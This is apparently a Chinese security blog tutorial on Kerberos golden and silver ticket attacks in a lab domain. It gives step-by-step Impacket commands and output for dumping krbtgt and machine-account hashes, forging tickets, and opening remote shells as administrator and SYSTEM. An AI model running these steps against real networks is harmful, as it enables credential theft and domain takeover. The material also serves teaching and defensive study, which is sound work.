鸢语数安

菜单

Administrator
发布于 2025-07-11 / 9 阅读
0
0

6.1 域权限维持之票据传递

#内网安全

一、黄金票据传递攻击

在Kerberos认证过程的AS-REP阶段,经过预认证后,KDC返回的TGT中加密部分authorization-data是使用krbtgt密钥加密的,而该部分存放着代表用户的PAC。

当获得了域内用户krbtgt的密钥值,就能够伪造高权限PAC,然后将其封装在TGT中。使用krbtgt生成高权限TGT是离线的,不需要连接KDC。

要创建黄金票据,需要知道以下信息:

  • krbtgt账户密钥
  • 域的SID值
  • 域名
  • 要伪造的域用户,一般填写高权限账户,如域管理员

实验环境:

域控:10.10.4.2(Win2019-DC1.sec.local)

域内主机:10.10.4.21

1、使用Impacket进行利用

导出必备信息



# 获取krbtgt账户密钥

(base) ┌──(root㉿Kali)-[~/tools/proxyshell-auto]
└─# /root/.local/bin/secretsdump.py sec.local/administrator:"Az123456@"@10.10.4.2 -just-dc-user sec/krbtgt
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1258230d20deb8fa8c0ee72e014ae813:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:f17ecd5329b2b676b5737a7e40c5cd26337048e048b09663ceef99178afff9d8
krbtgt:aes128-cts-hmac-sha1-96:48387c994c399862ae5ef5a7c86f0c8e
krbtgt:des-cbc-md5:512a436789e32394
[*] Cleaning up...

# 获取域的SID
(base) ┌──(root㉿Kali)-[~/tools/proxyshell-auto]
└─# /root/.local/bin/lookupsid.py sec.local/administrator:"Az123456@"@10.10.4.2
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies

[*] Brute forcing SIDs at 10.10.4.2
[*] StringBinding ncacn_np:10.10.4.2[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2066713137-2133816201-3751750268
498: SEC\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SEC\Administrator (SidTypeUser)

Impacket生成黄金票据

(base) ┌──(root㉿Kali)-[~]
└─# /root/.local/bin/ticketer.py -domain-sid S-1-5-21-2066713137-2133816201-3751750268 -aesKey 48387c994c399862ae5ef5a7c86f0c8e -domain sec.local administrator
/root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sec.local/administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in administrator.ccache

(base) ┌──(root㉿Kali)-[~]
└─# export KRB5CCNAME=administrator.ccache

尝试导出用户Hash

(base) ┌──(root㉿Kali)-[~]
└─# /usr/local/bin/secretsdump.py -k -no-pass WIN2019-DC1.sec.local -dc-ip 10.10.4.2 -just-dc-user test2
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
sec.local\test2:1164:aad3b435b51404eeaad3b435b51404ee:27d86657f458a28aeed03655ba6a6137:::
[*] Kerberos keys grabbed
sec.local\test2:aes256-cts-hmac-sha1-96:7b12c5416a7492517b399e0b2545c09b8b73cd67521bc470fb4348e4e6a2822c
sec.local\test2:aes128-cts-hmac-sha1-96:e28e2621d5b3e90b71c8e5078fc0f2b1
sec.local\test2:des-cbc-md5:4a6297fe387f7020
[*] Cleaning up...

尝试wmiexec

(base) ┌──(root㉿Kali)-[~]
└─# /usr/local/bin/wmiexec.py -k -no-pass WIN2019-DC1.sec.local -dc-ip 10.10.4.2 -just-dc-user test2
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

usage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug]
                  [-codec CODEC] [-hashes LMHASH:NTHASH] [-no-pass] [-k]
                  [-aesKey hex key] [-dc-ip ip address] [-A authfile]
                  [-keytab KEYTAB]
                  target [command [command ...]]
wmiexec.py: error: unrecognized arguments: -just-dc-user test2

(base) ┌──(root㉿Kali)-[~]
└─# /usr/local/bin/wmiexec.py -k -no-pass WIN2019-DC1.sec.local -dc-ip 10.10.4.2
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sec.local\administrator

C:\>

2、mimikatz进行利用

pass

3、CobaltStrike进行利用

pass

二、白银票据传递

在Kerberos认证过程的TGS-REP阶段,在验证客户端发来的TGT的真实性和会话安全性后,KDC的TGS票据授予服务返回指定服务的ST。ST中加密部分authorization-data是使用服务密钥进行加密的,而该部分存放着代表用户身份的PAC。

当拥有了服务密钥后,就能伪造高权限PAC,然后封装进ST中,并进行高权限访问。

白银票据需要的信息:

  • 域的SID值
  • 域名
  • 要伪造的域用户

获取所需的信息

# 获取域控的机器账户
(base) ┌──(root㉿Kali)-[~]
└─# /root/.local/bin/secretsdump.py sec.local/administrator:"Az123456@"@10.10.4.2 -just-dc-user SEC/WIN2019-DC1\$
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
WIN2019-DC1$:1000:aad3b435b51404eeaad3b435b51404ee:8c0d3761c08f5f0f30d284be3fbcf77b:::
[*] Kerberos keys grabbed
WIN2019-DC1$:aes256-cts-hmac-sha1-96:cca91bb572a359fdf45c570e2a93317244cb1f1facbeabaaea1cde312089bb09
WIN2019-DC1$:aes128-cts-hmac-sha1-96:85061b1b1ba973a86d30ebb5e7396cc1
WIN2019-DC1$:des-cbc-md5:941ab0079204e62a
[*] Cleaning up...

# 获取域的SID
(base) ┌──(root㉿Kali)-[~/tools/proxyshell-auto]
└─# /root/.local/bin/lookupsid.py sec.local/administrator:"Az123456@"@10.10.4.2
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies

[*] Brute forcing SIDs at 10.10.4.2
[*] StringBinding ncacn_np:10.10.4.2[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2066713137-2133816201-3751750268
498: SEC\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SEC\Administrator (SidTypeUser)

1、Impacket

生成白银票据

# 注意需要使用nthash
(base) ┌──(root㉿Kali)-[~]
└─# /root/.local/bin/ticketer.py -domain-sid S-1-5-21-2066713137-2133816201-3751750268 -nthash 8c0d3761c08f5f0f30d284be3fbcf77b -spn cifs/WIN2019-DC1.sec.local -domain sec.local administrator
/root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sec.local/administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in administrator.ccache

(base) ┌──(root㉿Kali)-[~]
└─# export KRB5CCNAME=administrator.ccache

smbexec

(base) ┌──(root㉿Kali)-[~]
└─# /usr/local/bin/smbexec.py -k -no-pass administrator@WIN2019-DC1.sec.local -dc-ip 10.10.4.2  -debug
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket
[+] StringBinding ncacn_np:WIN2019-DC1.sec.local[\pipe\svcctl]
[+] Using Kerberos Cache: administrator.ccache
[+] Domain retrieved from CCache: SEC.LOCAL
[+] Returning cached credential for CIFS/WIN2019-DC1.SEC.LOCAL@SEC.LOCAL
[+] Using TGS from cache
[+] Executing %COMSPEC% /Q /c echo cd  ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
[+] Executing %COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
nt authority\system

C:\Windows\system32>

三、黄金票据和白银票据的联系与区别

1、联系

  • 两者都是基于Kerberos认证的攻击方式
  • 两者都属于票据传递攻击
  • 两者都常用于后渗透维权

2、区别

(1)访问权限不同

黄金票据:通过伪造高权限TGT,可以一高权限访问任何服务

白银票据:通过伪造高权限ST,只可以伪造指定服务

(2)加密密钥不同

黄金票据:通过krbtgt密钥加密(AES和NTHash均可)

白银票据:通过机器账户的服务密钥(只支持NTHash)

3、日志不同

黄金票据:只伪造了TGT,还需要向KDC申请ST,会在KDC留下日志

白银票据:只伪造了ST,只会在目标机器留下日志

6.2 域权限维持之委派
5.8 Exchange Prox...

评论